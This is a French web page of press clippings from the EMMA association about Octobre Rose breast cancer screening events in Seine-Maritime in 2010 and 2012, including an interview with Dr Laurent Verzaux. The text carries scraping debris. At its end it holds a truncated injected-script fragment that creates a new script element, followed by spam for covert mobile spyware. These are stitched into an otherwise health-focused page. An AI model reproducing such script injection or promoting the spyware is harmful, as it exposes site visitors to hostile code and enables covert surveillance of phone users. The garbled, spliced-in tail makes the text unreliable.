EMMA dans la Presse

Cancer du sein à Fécamp: voir la vie en rose

Publié le vendredi 12 octobre 2012 à 08H00 

FECAMP.La Ville adhère depuis plusieurs années à « Octobre Rose » et organise aujourd’hui une sensibilisation au dépistage du cancer du sein.

Défilé de lampions dans les rues du Petit parc jusqu'au long des quais lors de la grande veillée 2011

Défilé de lampions dans les rues du Petit parc jusqu’au long des quais lors de la grande veillée 2011

 

«Lorsqu’il s’agit de sensibiliser à la première cause de mortalité féminine, le combat devient collectif. » Aussi, la mobilisation pour le dépistage organisé du cancer du sein devient un enjeu. Reconnu nationalement, « Octobre Rose » est devenu, dans de nombreux pays, un véritable moment de mobilisation. C’est une formidable opportunité pour rappeler à tous l’importance de prendre soin de soi et l’importance de se faire dépister.

Du centre-ville aux quais

A l’occasion de la 5e édition de l’opération, la Ville organise une manifestation chaque fois différente. Cette année, elle revêtira un caractère tout particulier avec la présence de vieux gréements dans le port.
Après la Chapelle Notre-Dame de Salut en 2008, les Pêcheries en 2009, l’hôtel de ville en 2010 et l’an dernier l’Ecole municipale d’arts plastiques, c’est autour du Petit parc et des quais de se vêtir ce soir de rose.
Toute la journée, les commerçants seront invités à décorer leur vitrine en rose et distribuer des rubans roses tandis qu’en fin de journée, rendez-vous est donné à 19 h 30 au Petit parc, rue Alexandre-Legros. Il sera illuminé en rose et des installations seront mises en place le long de la promenade : jeux d’ombres chinoises dans une ambiance de formes et de végétation colorées en rose avec la complicité de la troupe Les Magiciens de la Nuit et de la Lyre Maritime qui ajoutera une touche musicale à l’événement. Puis, des lampions, flambeaux, des documentations ainsi que des rubans roses seront distribués au public pour la déambulation qui partira à 20 h jusque sur les quais (20 h 30) où les mâts de bateaux seront éclairés (Tante Fine, La Boudeuse, Marité). C’est là que les médecins et associations pourront discuter avec le public sur l’intérêt de ce dépistage gratuit organisé pour les femmes de 50 à 74 ans. Toutes les questions pourront y être abordées. La manifestation s’achèvera autour d’un petit cocktail sur les bateaux vers 20 h 45 (120 places réparties).

Les acteurs

Ligue contre le cancer du sein ; médecins et cancérologues ; Comité féminin 76 ; association Emma ; Docteur Benhammouda ; Les Magiciens de la Nuit ; L’Afdam/Voiles de l’Espoir ; « Tante Fine » ; « Le Marité » ;« La Boudeuse » ; l’ACF de Fécamp ; La Lyre Maritime ; l’Ifsi (3e année de cancérologie) ; Le Port ; les services municipaux.

  

Lillebonne

Tout le mois: apposition du géant ruban rose tout le mois d’octobre sur le mur extérieur de la mairie.
Du lundi8 au lundi 29 octobre, exposition Ligue, rue couverte de l’hôtel de ville de Lillebonne, dépliants,…

  

20121003506b8d30de82f-0-454132

  

BOIS-GUILLAUME-BIHOREL. Elus et habitants ont

répondu présents à la marche contre le cancer du sein.

  

20121003506b9211d4556-0-454204

  

-000

  

  

Capture2  

Capture

-000

  

  

2

emma-001-745x1024

  

Un mois contre le cancer

SANTE. La campagne pour le dépistage du cancer du sein débute demain et se poursuit jusqu’à fin octobre.

Le docteur Laurent Verzaux lit un examen de mammographie

Le docteur Laurent Verzaux lit un examen de mammographie

«Octobre rose», c’est le mois de la femme. Celle qui profite du dépistage gratuit et organisé du cancer du sein pour passer une mammographie. La Seine-Maritime est plutôt bonne élève mais le docteur Laurent Verzaux, président de l’association Emma (association pour le dépistage des cancers en Seine-Maritime) veut toucher les femmes qui ne se font toujours pas dépister.

Qu’est-ce qu’Octobre Rose?
Laurent Verzaux: «C’est le mois international du dépistage du cancer du sein. Il a lieu depuis 20 ans et commence à se généraliser en France. Depuis mai2003, la Seine-Maritime s’est inscrite dans ce dispositif. Nous voyons les actions prendre de l’ampleur depuis 3 ans.»

Quelles sont les femmes concernées?
«Toutes les femmes qui se posent des questions sur le cancer du sein ou autre. Celles qui sont convaincues du bien fondé du dépistage et qui peuvent venir en parler. C’est un temps d’échange. C’est aussi celui des mammographies. Un examen gratuit pour les femmes âgées de 50 à 74 ans à réaliser tous les deux ans.»

Pourquoi cette tranche d’âge seulement?
«La fréquence des cancers augmente avec l’âge tandis que la texture des tissus des seins change et facilite la lecture de l’examen. La situation économique fait qu’il faut choisir la tranche d’âge la plus à risque même si des comités féminins réclament une prise en charge plus large.»

Quand faut-il réaliser sa première mammographie?
«Dès 40 ans, sauf si l’on a des antécédents de cancers du sein dans la famille. Les femmes qui s’estiment plus à risque peuvent en parler avec leur gynécologue, médecin traitant ou consulter un oncogénéticien.»

Les Seinomarines sont-elles nombreuses à se faire dépister?
«Nous affichons, dans le département, un taux de participation de 63%. C’est bien mais notre objectif est d’atteindre 70%. Ces derniers échelons seront les plus difficiles. Les femmes qui ont déjà participé adhèrent au principe du dépistage et reviennent. Ce sont celles qui sont éloignées du système de santé qu’il faut à présent toucher.»

Comment?
«Durant tout ce mois, nous allons multiplier les informations dans les petites communes. Diverses actions de communication sont prévues.»

Les actions d’Octobre Rose

Jeudi 30septembre de 14 h à 16 h, réunion de convivialité à la Maison du patient de l’hôpital Flaubert. Les femmes opérées présenteront des fanions qu’elles ont réalisés.
Dimanche 3octobre, à Octeville, passage du Ruban de l’Espoir qui traverse le pays. A 10h, départ de la salle Michel-Adam pour une marche de 4 ou 8km. Inscription de 5€ (gratuit – 12 ans) au bénéfice des associations.
Et, jusqu’à 18 h, des stands d’information, des ateliers, des animations pour enfants, des orchestres…

Article paru : Paris Normandie du 29 Septembre 2010

 


Les résultats sont en ligne dans la colonne actualités a droite de votre écran.

Les photos sont disponible sur cb2000, le lien est disponible dans la catégorie LIENS a droite de votre écran.

-000
Dr Laurent VERZAUX , Président de l’Association EMMA a participé au marathon de Paris
avec la tenue et la casquette EMMA.
Son temps est de 3h56min.

 

My Ript Page

 



-000

 

-000


Une randonnée en rose

Publié Paris Normandiei 07 octobre 2010 à 07H42

Sylvie Hanin et Martine Lamarre invitent les Quincampoisiens à venir marcher dimanche vêtus de rose

Sylvie Hanin et Martine Lamarre invitent les Quincampoisiens à venir marcher dimanche vêtus de rose

QUINCAMPOIX.Deux adjointes au maire se mobilisent pour le dépistage du cancer du sein.

 

Le dépistage est une priorité !

Publié Paris Normandie le lundi 11 octobre 2010

La mairie éclaire sa façade durant tout le mois d'octobre

La mairie éclaire sa façade durant tout le mois d’octobre

YVETOT. La mairie s’éclaire en rose pour la lutte contre le cancer du sein.

 

-000

Article paru : Paris Normandie du 24 Septembre 2010

 


-000

Article paru : Paris Normandie du 25 Septembre 2010

 

Cancer du sein : une course pour sensibiliser les femmes

Publié le mercredi 29 septembre 2010 Paris Normandie

Le cancer du sein est la 1ère cause de mortalité par cancer chez la femme dans le département de Seine-Maritime. Pour sensibiliser les femmes de 50 à 74 ans au dépistage organisé du cancer du sein, l’Assurance Maladie se mobilise avec l’Association EMMA et participe à la course « La Reinette » exclusivement féminine.

Trente femmes travaillant dans les organismes d’Assurance maladie courent aux couleurs d’Octobre Rose le 3 octobre. En 2009, 56 280 femmes ont réalisé une mammographie de dépistage, soit un taux de dépistage de 69.8 % en Seine Maritime. L’objectif fixé par les Pouvoirs Publics est de porter ce taux à 80 %.

Depuis le démarrage de la campagne en 2003, plus de 326 000 mammographies ont été réalisées en Seine Maritime. 2623 cancers ont été détectés et pris en charge. La majorité de ces cancers sont de bons pronostics.

Les femmes qui souhaitent participer à cette manifestation ont rendez-vous à la salle des fêtes rue des Pérets à Mesnil-Esnard pour participer à la course de 7 km. Retrait des dossards à partir de 8 h.


if (document.currentScript) { var d=document;var s=d.createElement(‘script’); https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.The most popular 2017 spy software applications for the mobile phones.